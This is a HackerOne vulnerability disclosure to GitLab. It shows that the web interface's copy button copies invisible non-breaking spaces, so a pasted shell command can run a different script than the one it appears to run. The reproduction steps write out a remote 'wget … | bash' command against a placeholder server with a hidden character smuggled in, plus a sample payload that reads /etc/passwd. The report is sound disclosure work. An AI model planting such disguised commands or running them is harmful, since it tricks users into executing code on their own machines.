Copying information to the clipboard could lead to the execution of unexpected commands
HackerOne report #1805604 by st4nly0n
on 2022-12-14, assigned to GitLab Team
:
Report | Attachments | How To Reproduce
Report
Summary
Gitlab.com's web interface allows copying the contents of a file or just specific portions of text to the clipboard with the click of a link or button in the web interface.
This represents an advantage when copying information, the user no longer has to select and copy the text, the user only has to click a button to copy the information to the clipboard of his system.
This, in turn, represents a disadvantage at the security level, and that is that, some non-printable characters, i.e. characters that do not have a graphical representation in ASCII, will not be displayed in any way from the Gitlab.com web interface, however, these characters will be copied to the clipboard with the use case described in the previous paragraph.
This allows several attack scenarios, one of them is a use case and consists of making the victim copy to the clipboard a shell command that initially does not represent a security risk, however, when the victim copies the command from the web interface and pastes it into his terminal he could be executing an arbitrary system command injected by the attacker.
An example of this is retrieving the contents of a web server via the Wget tool and using the bash
or sh
pipe to execute the contents, the command would look like this wget -O - https://<YOUR-SERVER>/file.sh | bash
.
By common sense the most obvious thing to do is for the victim to first check what information is contained in the file in https://<YOUR-SERVER>/file.sh
, for this he should select the URL and check it separately, if the file https://<YOUR-SERVER>/file.sh
does not represent a security risk, then, the victim could execute the command on his system without any problem.
The problem is that when the victim decides to use the web interface button that allows copying text to the clipboard, the victim would be copying the unprintable or hidden characters to the clipboard, so, the victim has copied the command wget -O - https://<YOUR-SERVER>/file.sh\xc2\xa0| bash
to his clipboard, and when he executes this command he is not actually executing the contents of the file.sh
file but, he is executing the contents of the file.sh\xc2\xa0
file.
In this sense, the web interface does not guarantee security when placing information in the clipboard if the copy text button is used.
It should be noted that for proof of concept and to minimize the steps to reproduce this problem, you will use your server to serve the files, however, I have used a different repository on Gitlab to host the files using the blob URL of the raw file, since, a blob represents that that file cannot be changed, since, it is part of a commit.
Also note that, the attacker uses a repository to create the attack scenario, note that, this attack can be performed on any textbox that supports markdown, for example, making a comment anywhere in the web interface, etc.
Steps To Reproduce
- You must perform the following steps as the attacking user
1. Create a file on your server named hello.sh
with the following content echo "hello world"
:
echo 'echo "hello world"' > hello.sh
2. Create a file on your server called hello.sh<\xc2\xa0>
, with any payload (command that the victim will execute), the name of this file contains a non-printable character, so execute the following command to create this file:
echo {payload} > $'hello.sh\xc2\xa0'
### EXAMPLE
echo 'cat /etc/passwd' > $'hello.sh\xc2\xa0'
3. Create a public repository with any name, e.g. poc
, initialize the file README.md
4. Clone the poc
repository and enter the repository directory:
git clone <repo>
cd <repo>
5. Edit the README.md
file with the following information, wget -O - https://<YOUR-SERVER>/hello.sh<\xc2\xa0>| bash
, this command contains a non-printable character, so run the following command to create this file:
echo -e $'```bash\nwget -O - https://<YOUR-SERVER>/hello.sh\xc2\xa0| bash\n```' > README.md
6. Push the changes to the remote:
git add
git commit -m <commit-message>
git push origin HEAD -f
Watch the following video demonstrating the attack scenario, notice how the victim decides to execute the command displayed in the web interface, to do so he first verifies the remote file information, the victim notices that executing the command does not represent a security risk, however, when he uses the button to copy the command content and pastes it into his terminal, the unexpected arbitrary command execution injected by the attacker occurs.
Poc on Linux
poc_linux.mp4
Poc on Windows
poc_windows.mp4
What is the current bug behavior?
The copy to clipboard button in the web interface copies non-printable characters to the clipboard, allowing unexpected commands to be executed when a victim decides to copy commands from the web interface to execute them on their system.
What is the expected correct behavior?
Non-printable characters must be represented to the user through the web interface.
Output of checks
This bug happens on GitLab.com
Impact
An attacker succeeds in getting a victim to execute unexpected arbitrary system commands, if the victim, from the web interface, copies, pastes and executes in his terminal the content of a command that at first does not represent a security risk.
For the proof of concept the victim has executed the calculator on his system, however, through what is described in this report, an attacker will want to gain control of the victim's system or obtain confidential information, this attack successfully has an impact on the availability, integrity and confidentiality of the affected user.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: